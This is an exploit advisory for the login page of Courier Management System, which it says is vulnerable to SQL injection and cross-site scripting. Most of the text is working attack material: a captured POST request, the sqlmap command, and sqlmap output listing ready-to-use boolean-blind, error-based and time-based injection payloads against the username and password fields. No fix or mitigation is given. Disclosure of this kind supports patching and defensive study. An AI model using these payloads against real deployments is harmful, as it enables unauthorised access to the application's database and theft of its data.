# Title : Courier Management System - Sql Injection and non-persistent XSS login portal
# Date: 17 January 2017
# Exploit Author: Sibusiso Sishi sibusiso@ironsky.co.za
# Tested on: Windows7 x32
# Vendor: http://couriermanageme.sourceforge.net/
# Version: not supplied
# Download Software: https://sourceforge.net/projects/couriermanageme/files/
#################################################
## About The Product : ##
Courier Management System is the simplest solution for Courier & Cargo Tracking Business. If you need to enable Tracking Option in your existing or new website, this is quickest Software Solution.You can get install it yourselves or We do the installation and brand it in your name on your hosting.The Courier Software is Very easy to setup and manage powerful administration. Provide online tracking system of consignment and shipping detail for International or domestic shipping
## Vulnerability : ##
The login portal is vulnerable to SQLi and cross-site scripting attacks
-HTTP Method : POST
POST /cms/login.php HTTP/1.1
Host: 192.168.19.135
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.19.135/cms/login.php
Cookie: PHPSESSID=q446r5fqav1qlljb7cohd29r85
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
txtusername=test&txtpassword=test&OfficeName=Fast+Courier+-+Jalgaon&Submit=Login+Now
- Sqlmap command: sqlmap -r exploit.txt
- Sqlmap Output :
sqlmap identified the following injection point(s) with a total of 824 HTTP(s) requests:
---
Parameter: txtpassword (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
Payload: txtusername=test&txtpassword=test' OR NOT 5887=5887#&OfficeName=Fast Courier - Jalgaon&Submit=Login Now
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: txtusername=test&txtpassword=test' AND (SELECT 9962 FROM(SELECT COUNT(*),CONCAT(0x71766a6b71,(SELECT (ELT(9962=9962,1))),0x717a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- CqJl&OfficeName=Fast Courier - Jalgaon&Submit=Login Now
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: txtusername=test&txtpassword=test' OR SLEEP(5)-- VMai&OfficeName=Fast Courier - Jalgaon&Submit=Login Now
Parameter: txtusername (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: txtusername=test' RLIKE (SELECT (CASE WHEN (9742=9742) THEN 0x74657374 ELSE 0x28 END))-- FJke&txtpassword=test&OfficeName=Fast Courier - Jalgaon&Submit=Login Now
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: txtusername=test' AND (SELECT 6984 FROM(SELECT COUNT(*),CONCAT(0x71766a6b71,(SELECT (ELT(6984=6984,1))),0x717a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nDYx&txtpassword=test&OfficeName=Fast Courier - Jalgaon&Submit=Login Now
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: txtusername=test' AND (SELECT * FROM (SELECT(SLEEP(5)))Aols)-- LarG&txtpassword=test&OfficeName=Fast Courier - Jalgaon&Submit=Login Now
---
[16:59:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.23, PHP 5.6.24
back-end DBMS: MySQL >= 5.0
